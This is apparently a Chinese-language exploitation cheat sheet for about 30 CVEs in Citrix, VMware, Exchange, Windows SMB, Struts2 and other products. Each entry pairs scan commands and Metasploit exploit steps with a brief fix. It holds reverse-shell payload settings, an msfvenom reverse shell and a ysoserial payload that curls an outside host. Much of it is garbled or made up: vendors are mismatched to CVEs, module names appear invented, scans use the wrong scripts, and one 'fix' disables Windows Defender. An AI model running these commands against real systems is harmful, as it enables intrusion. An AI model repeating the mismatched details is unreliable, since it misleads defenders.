1.CVE-2019-19781 Citrix漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap或Metasploit的citrix_enum模塊進行掃描。
# 使用Nmap掃描
nmap -p 80,443 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/citrix_enum
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的citrix_adc_cve_2019_19781模塊進行利用。
use exploit/linux/http/citrix_adc_cve_2019_19781
set RPORT 443
set TARGETURI /vpn/
set USERNAME <username>
set PASSWORD <password>(3)詳細的修復辦法:
下載v11.1、v12.0以及v13.0版本的Citrix ADC和Gateway軟件更新,或禁用易受攻擊的目錄遍歷服務URL路徑。
2.CVE-2019-11510 Pulse Secure VPN漏洞
(1)使用Nmap掃描目標主機開放的443端口,也可以使用Metasploit的http_pulsesecure_traversal模塊進行掃描。
nmap --script ssl-heartbleed -p 443 <target_IP>
use auxiliary/scanner/http/pulsesecure_traversal(2)使用Metasploit的pulsesecure_cmd_exec模塊進行利用。
use exploit/linux/http/pulsesecure_cmd_exec
set SSL true
set TARGETURI /dana-na/../vpns/portal/scripts/newbm.pl(3)漏洞修復
使用Pulse Secure發(fā)布的最新軟件更新修補此漏洞,還需同時修改密碼和密鑰,以增強安全性。
3.CVE-2020-5902 F5 BIG-IP漏洞
(1)使用Nmap掃描目標主機開放的443端口,也可以使用Metasploit的http_f5_bigip_check模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2020-5902 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_f5_bigip_check
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的f5_bigip_tmsh_rce模塊進行利用。
use exploit/unix/http/f5_bigip_tmsh_rce
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /tmsh/tmshCmd.jsp
run(3)詳細的修復辦法:
立即升級到最新版本的BIG-IP軟件,最新版本中包含了對此漏洞的修補。
4.CVE-2021-21972 VMware vSphere Client漏洞
(1)使用Nmap掃描目標主機,檢查TCP 443端口是否開放。也可以使用Metasploit的vmware_vcenter_login模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-22986 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/f5_bigip_cookie
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的f5_bigip_restapi_rce模塊進行利用。
use exploit/linux/http/f5_bigip_restapi_rce
set RHOSTS <target_IP>
set TARGETURI /mgmt/tm/util/bash
set PASSWORD <password>
set USERNAME <username>
run(3)詳細的修復辦法:
立即升級F5 BIG-IP軟件的最新版本,另外,管理員還要加強密碼策略和網(wǎng)絡安全設置。
5.CVE-2021-26855 Exchange漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機,檢查TCP 443端口是否開放。也可以使用Metasploit的http_enum模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/http_enum
set RHOSTS <target_IP>
set RPORT 443
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的microsoft_exchange_server_proxylogon模塊進行利用。
use exploit/windows/http/microsoft_exchange_server_proxylogon
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run(3)詳細的修復辦法:
立即升級Exchange軟件的最新版本,或使用Microsoft發(fā)布的補丁來修復此漏洞。
6.CVE-2020-1472 ZeroLogon漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機開放的SMB服務端口,如果開放了445或139端口,則可能存在此漏洞。也可以使用Metasploit中的smb_version模塊進行掃描。
# 使用Nmap掃描
nmap -p 445,139 --script smb-vuln-ms17-010 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/smb/smb_version
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的cve_2020_1472_zerologon模塊進行利用。
use exploit/windows/smb/cve_2020_1472_zerologon
set RHOSTS <target_IP>
set SMBDomain <domain_name>
set SMBUser <username>
set SMBPass <password>
run(3)詳細的修復辦法:
使用Microsoft發(fā)布的補丁修復此漏洞,或者將DCs升級到最新版本。
7.CVE-2021-34527 PrintNightmare漏洞
(1)漏洞檢測或者掃描方法:
使用PowerShell腳本進行檢測:
Get-SmbShare | ForEach-Object { Get-Acl $_.Name | ForEach-Object { $_.Access } } | Where-Object IdentityReference -match 'Everyone|BUILTIN\\Users' | Select-Object FileSystemRights, IdentityReference, AccessControlType, IsInherited | Format-List使用Microsoft提供的補丁測試工具進行漏洞檢測:
# Windows Server 2019/Windows 10 Version 1809 or later
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll
# Windows Server 2012/Windows 8 through earlier versions
.\RPT-Test.exe -Target <target_IP> -UntrustedFile \\path\to\payload.dll -VerifySignature 0(2)漏洞詳細利用方法及步驟參考:
使用PowerShell腳本進行利用:
$code = @'
using System;
using System.Runtime.InteropServices;
public class HelloWorld {
public static void Main() {
string cmd = "calc.exe";
NativeMethods.WinExec(cmd, 0);
}
}
internal static class NativeMethods {
[DllImport("kernel32")]
public static extern int WinExec(string cmd, int nCmdShow);
}
'@
Add-Type $code
[HelloWorld]::Main()使用Metasploit的windows/local/ntprint_smb模塊進行利用:
use exploit/windows/local/ntprint_smb
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <attack_IP>
set RHOSTS <target_IP>
run(3)詳細的修復辦法:
Microsoft已經(jīng)發(fā)布了安全更新程序,建議用戶盡快升級到最新版并關閉Windows打印機共享服務。此外,也可以通過策略或命令行的方式禁用Windows打印機共享服務,或者限制用戶對打印機共享的訪問來減少攻擊面。
8.CVE-2021-21985 vSphere Client漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_upload_file模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21985 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_upload_file
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的vmware_vcenter_server_rce模塊進行利用。
use exploit/linux/http/vmware_vcenter_server_rce
set RHOSTS <target_IP>
set USERNAME <username>
set PASSWORD <password>
run(3)詳細的修復辦法:
VMware官方發(fā)布了vCenter Server 6.7 U3j、7.0 U2c和7.0 Update 2e版本的更新程序來修復此漏洞,管理員可以下載并安裝最新版本的軟件來修補此漏洞。
9.CVE-2021-31166 IIS漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機的HTTP服務,也可以使用Metasploit的http_iis_webdav_upload_asp模塊進行掃描。
# 使用Nmap掃描
nmap -p80 --script http-vuln-cve2021-31166 <target_IP>
# 使用Metasploit模塊
use exploit/windows/http/iis_webdav_upload_asp
set RHOSTS <target_IP>
set RPORT 80
set SSL false
set TARGETURI /webdav/test.txt
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的http_iis_webdav_payload模塊進行利用。
use exploit/windows/http/iis_webdav_payload
set RHOSTS <target_IP>
set VHOST <host_header>
set LHOST <local_IP>
run(3)詳細的修復辦法:
下載并安裝最新版本的IIS軟件更新來修補此漏洞,或者在服務器上禁用WebDAV協(xié)議。
10.CVE-2021-1636 Windows Defender漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了Windows Defender的遠程管理端口5985,也可以使用Metasploit的windows/local/ms-windefender-bypass模塊進行掃描。
# 使用Nmap掃描
nmap -p 5985 <target_IP>
# 使用Metasploit模塊
use exploit/windows/local/ms-windefender-bypass
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的windows/local/ms-windefender-bypass-exe模塊進行利用。
use exploit/windows/local/ms-windefender-bypass-exe
set LHOST <local_IP>
set LPORT <local_port>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run(3)詳細的修復辦法:
立即安裝微軟發(fā)布的最新累積更新,或者手動禁用Windows Defender。
11.CVE-2021-22893 Fortinet SSL VPN漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了Fortinet SSL VPN的HTTPS服務,也可以使用Metasploit的http_fortinet_upload_exec模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script ssl-heartbleed <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/fortinet_upload_exec
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的fortinet_sslvpn_webauth_form_cmd_exec模塊進行利用。
use exploit/windows/http/fortinet_sslvpn_webauth_form_cmd_exec
set RHOSTS <target_IP>
set RPORT 443
set TARGETURI /remote/login?lang=en
set SSL true
run(3)詳細的修復辦法:
將Fortinet SSL VPN升級到最新版本并檢查配置是否正確,確保安裝了所有推薦的組件和補丁。
12.CVE-2021-21972 vSphere Client漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21972模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21972 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21972
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的vmware_vcenter_js_fckeditor模塊進行利用。
use exploit/linux/http/vmware_vcenter_js_fckeditor
set RHOSTS <target_IP>
set TARGETURI /fckeditor/editor/filemanager/connectors/test.html
run(3)詳細的修復辦法:
立即升級vCenter Server,vSphere Client和ESXi軟件,或者使用VMware發(fā)布的補丁并重新部署系統(tǒng)。
13.CVE-2021-21979 vCenter Server漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了443端口,也可以使用Metasploit的vmware_vcenter_cve_2021_21979模塊進行掃描。
# 使用Nmap掃描
nmap -p 443 --script http-vuln-cve2021-21979 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/vmware_vcenter_cve_2021_21979
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的vmware_vcenter_server_appliance_rce模塊進行利用。
use exploit/linux/http/vmware_vcenter_server_appliance_rce
set RHOSTS <target_IP>
set TARGETURI /ui/h5-vsan/rest/proxy/service/&vsanQueryUtil.getDiagnosticFileCnotallow=1?path=/var/log/vmware/vsan-health/*
run(3)詳細的修復辦法:
下載并安裝VMware發(fā)布的最新版本的軟件更新,或者使用VMware發(fā)布的補丁修復此漏洞。
14.CVE-2021-22879 SonicWall VPN漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否開放了SonicWall VPN的HTTP端口,也可以使用Metasploit的http_sonicwall_sslvpntest模塊進行掃描。
# 使用Nmap掃描
nmap -p 443,8443 --script http-vuln-cve2021-20016 <target_IP>
# 使用Metasploit模塊
use auxiliary/scanner/http/sonicwall_sslvpntest
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的sonicwall_netextender_rce模塊進行利用。
use exploit/linux/http/sonicwall_netextender_rce
set RHOSTS <target_IP>
set RPORT 443
set SSL true
run(3)詳細的修復辦法:
下載并安裝最新版本的SonicWall NetExtender客戶端,或者升級到最新版本的SonicWall SMA和Firewall軟件。
15.CVE-2017-0144 EternalBlue漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap進行端口掃描,或使用Metasploit的ms17_010_eternalblue模塊進行掃描。
使用Nmap掃描
nmap -sV --script smb-vuln-ms17-010 <target_IP>使用Metasploit模塊
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的windows/shell/reverse_tcp模塊進行反向Shell連接。
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST <local_IP>
set LPORT <local_port>
run(3)詳細的修復辦法:
立即安裝微軟發(fā)布的最新安全更新或累積更新,或禁用不必要的SMBv1協(xié)議。
16.CVE-2019-18935 Citrix ADC漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否存在Citrix ADC,或使用Citrix提供的cxcheck.c腳本進行單個主機掃描。
使用Nmap掃描
nmap -p 80,443 <target_IP>使用cxcheck.c腳本進行單個主機掃描
gcc cxcheck.c -lpthread -o cxcheck
./cxcheck <target_IP>(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的citrix_adc_cve_2019_19781_directory_traversal模塊進行利用。
use auxiliary/scanner/http/citrix_adc_cve_2019_19781_directory_traversal
set RHOSTS <target_IP>
set SRVHOST <local_IP>
run(3)詳細的修復辦法:
下載并安裝Citrix發(fā)布的安全更新補丁,或通過網(wǎng)絡隔離等措施進行防范。
17.CVE-2020-14750 Oracle WebLogic Server漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap掃描目標主機是否存在Oracle WebLogic Server,或使用Metasploit的http_weblogic_ssrf_exec模塊進行掃描。
使用Nmap掃描
nmap -p 7001,7002 --script=oracle-tns-version <target_IP>使用Metasploit模塊
use exploit/multi/http/weblogic_ssrf
set RHOSTS <target_IP>
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/weblogic_ssrf_advise_poc模塊進行利用。
use exploit/multi/http/weblogic_ssrf_advise_poc
set RHOSTS <target_IP>
run(3)詳細的修復辦法:
下載并安裝Oracle發(fā)布的最新安全更新補丁,或通過網(wǎng)絡隔離等措施進行防范,如配置WebLogic防火墻、禁用未使用的組件等措施。同時,建議實現(xiàn)強身份驗證,并將系統(tǒng)域名與其他軟件綁定在一起以保護WebLogic服務器,避免利用URL入侵漏洞。
18.CVE-2020-0796 SMBv3 Ghost漏洞
(1)漏洞檢測或者掃描方法:
使用Nmap進行端口掃描,或使用Metasploit的smb2_compression_zero模塊進行掃描。
使用Nmap掃描
nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-cve2020-0796 <target_IP>使用Metasploit模塊
use auxiliary/scanner/smb/smb2_compression_zero
set RHOSTS <target_IP>
set RPORT 445
run(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的windows/smb/smbv3_client_reliable_dialect_leak模塊進行利用。
use exploit/windows/smb/smbv3_client_reliable_dialect_leak
set RHOSTS <target_IP>
set SMBPIPE <smb_pipe_name>
run(3)詳細的修復辦法:
盡快安裝微軟發(fā)布的補丁,禁用不必要的SMBv3協(xié)議或進行防火墻限制,以及限制網(wǎng)絡流量從外部接入。
19.Shiro反序列化漏洞(CVE-2020-13933)
(1)漏洞檢測或掃描方法:
使用ysoserial工具生成payload,發(fā)送到目標Shiro服務器并觀察是否觸發(fā)了漏洞。
使用ysoserial工具生成payload
java -jar ysoserial.jar CommonsCollections1 "curl yourserver.com/xxx"|base64發(fā)送payload到目標服務器并觀察是否觸發(fā)漏洞
(2)漏洞詳細利用方法及步驟參考:
使用msfvenom生成payload,然后使用Metasploit的multi/http/shiro_default_password_exec模塊進行利用。
使用msfvenom生成payload
msfvenom -p java/meterpreter/reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -o payload.bin使用Metasploit的模塊進行攻擊
use exploit/multi/http/shiro_default_password_exec
set RHOSTS <target_IP>
set TARGETURI /xxx
set PAYLOADFILE payload.bin
run(3)詳細的修復辦法:
升級Apache Shiro版本,禁止使用未授權的功能。
20.Struts2-032遠程代碼執(zhí)行漏洞(CVE-2016-3087)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn.py -u http://<target_IP>/index.action -c "command"
struts-pwn:https://github.com/mazen160/struts-pwn(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_code_exec_showcase模塊進行利用。
use exploit/multi/http/struts2_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù)。
21.Struts2-045遠程代碼執(zhí)行漏洞(CVE-2017-5638)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -sV --script http-vuln-cve2017-5638 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進行利用。
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,限制上傳文件類型,加強日志監(jiān)控。
22.Struts2-053遠程代碼執(zhí)行漏洞(CVE-2017-5638)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -sV --script http-vuln-cve2017-5638 <target_IP>使用Struts2-Scan腳本
python struts-pwn_CVE-2017-5638.py -u http://<target_IP>/index.action -c "command"
Struts2-Scan:https://github.com/lazym0nk3y/Struts2-Scan(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_content_type_ognl模塊進行利用。
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,限制上傳文件類型,加強日志監(jiān)控。
23.Struts2-061遠程代碼執(zhí)行漏洞(CVE-2020-17530)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -sV --script http-vuln-cve2020-17530 <target_IP>使用Struts2-Scan腳本
python3 Struts2_061_scanner.py -u http://<target_IP>/ -c "touch hack.txt"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/linux/http/struts2_namespace_ognl模塊進行利用。
use exploit/linux/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,加強輸入校驗和過濾,限制系統(tǒng)命名空間。
24.Struts2-016遠程代碼執(zhí)行漏洞(CVE-2013-2251)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2013-2251.py -u http://<target_IP>/index.action -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts_code_exec_class模塊進行利用。
use exploit/multi/http/struts_code_exec_class
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/example/HelloWorld.action
set CMD <command_to_execute>
run(3)詳細的修復辦法:
升級至最新版本的Struts2,限制訪問權限和用戶輸入數(shù)據(jù),加強異常處理。
25.Struts2-037遠程代碼執(zhí)行漏洞(CVE-2016-3081)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts_dmi_exec模塊進行利用。
use exploit/multi/http/struts_dmi_exec
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù)。此漏洞也可以通過在web.xml文件中配置一個安全過濾器來修復。
26.Struts2-052遠程代碼執(zhí)行漏洞(CVE-2017-9805)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2017-9805.py -u http://<target_IP>/struts2-showcase/index.action -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_rest_xstream模塊進行利用。
use exploit/multi/http/struts2_rest_xstream
set RHOSTS <target_IP>
set TARGETURI /struts2-rest-showcase/orders/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,禁用不必要的功能,過濾用戶輸入數(shù)據(jù),限制訪問權限。此漏洞也可以通過在web.xml文件中配置一個安全過濾器來修復。
27.Struts2-013遠程命令執(zhí)行漏洞(CVE-2013-1966)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn.py -u http://<target_IP>/index.action -c "command"
(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts_exec_namespace_ognl模塊進行利用。
use exploit/multi/http/struts_exec_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,限制訪問權限和用戶輸入數(shù)據(jù),加強異常處理。同時,建議在web.xml文件中配置一個安全過濾器來緩解此漏洞的影響。
28.Struts2-033遠程命令執(zhí)行漏洞(CVE-2016-3081)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2016-3081.py -u http://<target_IP>/struts2-showcase/index.action -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts_code_exec_showcase模塊進行利用。
use exploit/multi/http/struts_code_exec_showcase
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,加強用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。
29.Struts2-057遠程代碼執(zhí)行漏洞(CVE-2018-11776)
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-CVE-2018-11776.py -u http://<target_IP>/index.action(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_namespace_ognl模塊進行利用。
use exploit/multi/http/struts2_namespace_ognl
set RHOSTS <target_IP>
set TARGETURI /struts/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,加強用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權限。另外,建議在web.xml文件中配置安全過濾器來緩解此漏洞的影響。
30.Struts2-devmode遠程代碼執(zhí)行漏洞
(1)漏洞檢測或掃描方法:
使用Nmap和Struts2-Scan腳本進行掃描。
使用Nmap掃描
nmap -p 80,443 --script http-vuln-struts2 <target_IP>使用Struts2-Scan腳本
python struts-pwn-devmode.py -u http://<target_IP>/struts2-showcase/ -c "command"(2)漏洞詳細利用方法及步驟參考:
使用Metasploit的exploit/multi/http/struts2_dev_mode模塊進行利用。
use exploit/multi/http/struts2_dev_mode
set RHOSTS <target_IP>
set TARGETURI /struts2-showcase/
run(3)詳細的修復辦法:
升級至最新版本的Struts2,加強用戶輸入數(shù)據(jù)的過濾和異常處理,限制訪問權限。另外,建議關閉devMode或限制只有特定IP地址能夠訪問。
